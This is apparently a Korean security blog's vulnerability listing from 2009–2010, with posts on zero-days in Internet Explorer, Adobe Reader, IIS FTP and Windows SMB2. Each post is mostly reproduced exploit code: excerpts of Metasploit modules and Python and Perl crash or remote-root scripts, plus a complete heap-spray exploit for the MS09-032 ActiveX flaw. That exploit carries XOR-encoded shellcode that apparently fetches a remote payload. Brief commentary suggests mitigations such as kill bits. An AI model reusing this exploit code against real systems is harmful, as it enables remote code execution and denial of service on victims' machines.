Category: Vulnerability

Internet Explorer 0-Day – MS10-002, CVE-2010-0249

마이크로소프트 1월 패치가 나오기 무섭게 인터넷 익스플로러에 대한 0-Day 취약점이 나왔습니다.중국 구글 해킹에 이용되었다고 알려진 Aurora 취약점 입니다.Metasploit 모듈도 나온 상태이며 Python으로 작성된 코드가 공개되었으니 주의하시기 바랍니다. [Metasploit code][#M_ more.. | less.. | [code]### $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $## ### This file is part of the Metasploit Framework and may be subject to# …

Adobe Reader and Acrobat (CVE-2009-4324) Exploit

얼마전 제로데이로 나왔던 Adobe Reader and Acrobat에 대한 Exploit 코드가 공개되었습니다.아래 코드로 생성된 PDF 파일을 실행하면 계산가기 실행됨을 알 수 있습니다.다만 자바스크립트 기능이 활성화 되어야 실행이 되니 패치가 나오기 전까진해당 기능을 비활성화 시키는 것이 좋을거 같네요. (그냥 잘 안쓰니까 계속 비활성화 하는게 더 나을지도…) [code]##   Author : Ahmed Obied (ahmed.obied@gmail.com)##   This program generates …

Internet Explorer 6/7 CSS Handling Denial of Service

Offensive Security 사이트에 익스플로러 관련 취약점이 올라왔다. 올라온 POC 코드는 쉘코드 부분이 계산기를 실행하는 쉘코드로 보이나 수정을 해야 할 것으로 보인다. 아래는 수정한 POC 코드이다. 음.. 이제 다음은 얘인가? [code]<!–securitylab.irK4mr4n_st (at) yahoo (dot) com [email concealed]–><!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”&gt;<HTML xmlns="http://www.w3.org/1999/xhtml”&gt;<HEAD><script>function load(){var e;e=document.getElementsByTagName("STYLE")[0];e.outerHTML="1";}</script><STYLE type="text/css">body{ overflow: scroll; margin: 0; }</style> <SCRIPT language="javascript">var shellcode …

Windows 7 , Server 2008R2 Remote Kernel Crash

=============================================– Release date: November 11th, 2009– Discovered by: Laurent Gaffie– Severity: Medium/High============================================= I. VULNERABILITY————————-Windows 7 * , Server 2008R2 Remote Kernel Crash II. BACKGROUND————————-#FAIL,#FAIL,#FAILSDL FAIL, ‘Most Secure Os Ever’ –> Remote Kernel in 2 mn.#FAIL,#FAIL,#FAIL III. DESCRIPTION————————-See : http://g-laurent.blogspot.com/ for much more details #Comment: This bug is specific Windows 7/2008R2. IV. PROOF OF CONCEPT————————-[code]#win7-crash.py:#Trigger a …

Vista/2008/Windows 7 SMB2 BSOD 0Day

Vista / 2008 / Windows7 에서 SMB 2.0 에 대한 BSOD(Blue Screen Of Death) 취약점이 나왔네요.어찌보면 크리티컬한 취약점이지만 그냥 그저 그러네요…. [code lang-python]#!/usr/bin/python# When SMB2.0 recieve a ‘&’ char in the ‘Process Id High’ SMB header field it dies with a# PAGE_FAULT_IN_NONPAGED_AREA from time import sleepfrom socket import *import sys if len(sys.argv) != 3:    print …

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

8월 31일자로 milw0rm 사이트에 제로데이가 올라왔습니다.윈도우 FTP 서버 취약점인데 Remote라 심각성이 클것으로 보이네요. http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html [code] # IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # August 2009 – KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, …

Microsoft Windows ‘BDATuner.MPEG2TuneRequest.1’ Object Remote Code Execution Vulnerability (CVE-2008-0015, MS09-032)

[code] var appllaa=’0′;var nndx=’%’+’u9’+’0’+’9’+’0’+’%u’+’9’+’0’+’9’+appllaa;var dashell=unescape(nndx+’%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDCE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%uD5DB%uc9c9%u87cd%u9292%ud4d0%ud1d1%ud6d1%ude93%ud0d2%uca92%u92d0%ucbce%ud5de%uced2%u93c9%uc5d8%ubdd8%ubdBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uBDBD%uEAEA’); // xor:0BDvar headersize=20;var omybro=unescape(nndx);var slackspace=headersize+dashell.length;while(omybro.length<slackspace)omybro+=omybro;bZmybr=omybro.substring(0,slackspace);shuishiMVP=omybro.substring(0,omybro.length-slackspace);while(shuishiMVP.length+slackspace<0x30000) //生成大量?据shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;memory=new Array();for(x=0;x<300;x++)memory[x]=shuishiMVP+dashell;var myObject=document.createElement(‘object’);DivID.appendChild(myObject);myObject.width=’1′;myObject.height=’1′;myObject.data=’./logo.gif’; //一?非GIF文件myObject.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’; [/code] 현재 패치가 안나온 상태이며 임시로 Kill Bit 설정이 필요해 보인다.설정법은 http://jjoon.net/tc/entry/Kill-Bit-%BC%B3%C1%A4-%B9%E6%B9%FD 참조. – 기타 국내 사이트 정보 –Ahnlab ASEC Threat Research : http://blog.ahnlab.com/asec/47NCHOVY : http://nchovy.kr/forum/2/article/458